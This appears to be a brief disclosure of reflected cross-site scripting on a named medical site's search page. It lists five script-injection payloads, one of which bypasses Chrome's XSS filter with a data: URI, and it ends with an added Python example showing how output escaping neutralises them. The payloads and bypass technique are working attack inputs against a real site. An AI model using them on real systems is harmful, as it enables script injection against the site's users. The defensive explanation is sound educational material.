Format: http://so.haodf.com/all.php?fromcode=utf-8&type=all&q=exp* or http://search.haodf.com/all.php? ... ;type=all&q=exp*
Payloads:
exp1: [</title><script>alert(/nandi/)</script><title>]
exp2: [" /><script>alert(/nandi/)</script><xss a="]
exp3: [a"><script>alert(/nandi/)</script><""]
exp4: [</center><script>alert(/nandi/)<center>]
The tests above were done in IE. When I switched to Chrome, the console reported "Refused to execute a JavaScript script. Source code of script found within request." An extremely strong filter. Comparing the page source before and after injection, I noticed the original page already contained a script tag attribute, so I built this code:
[<script src=data:,alert(/nandi/)<!--]
Inserting it successfully bypassed the filter in Chrome and popped the XSS.
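As an added illustration from the defender's side (this code is not from the post or from the site described), the following shows why a raw reflection of the search query is exploitable by the five payloads above and how context-aware HTML escaping on the server neutralises all of them; the browser-side filter the post bypasses (Chrome's XSS Auditor, since removed from Chrome) was never a substitute for that. The page template, the function names and the detector are hypothetical simplifications, not the real site's code.

```python
import html

# Constructed inputs: the payloads quoted in the post above.
PAYLOADS = [
    '</title><script>alert(/nandi/)</script><title>',
    '" /><script>alert(/nandi/)</script><xss a="',
    'a"><script>alert(/nandi/)</script><""',
    '</center><script>alert(/nandi/)<center>',
    '<script src=data:,alert(/nandi/)<!--',
]

# Hypothetical, simplified search-result template (assumption, not the real
# page). The query is reflected into a <title>, a double-quoted <input value>
# attribute and a <center> block: the three contexts the payloads break out of.
TEMPLATE = (
    '<html><head><title>Search: {q}</title></head>'
    '<body><input type="text" value="{q}" />'
    '<center>Results for {q}</center></body></html>'
)


def render_unsafe(q: str) -> str:
    """Reflects the raw query verbatim: the defect the post describes."""
    return TEMPLATE.format(q=q)


def render_safe(q: str) -> str:
    """Escapes the query for both text and double-quoted attribute context.

    html.escape(quote=True) rewrites < > & " ' as entities, so the input can
    no longer close the current tag or attribute, nor open a new element.
    """
    return TEMPLATE.format(q=html.escape(q, quote=True))


def has_injected_script(page: str) -> bool:
    """Crude check on rendered output for a reflected <script> element.

    It flags the symptom the post reports; it is a test helper, not a
    sanitiser, and must not be used in place of escaping on output.
    """
    return '<script' in page.lower()
```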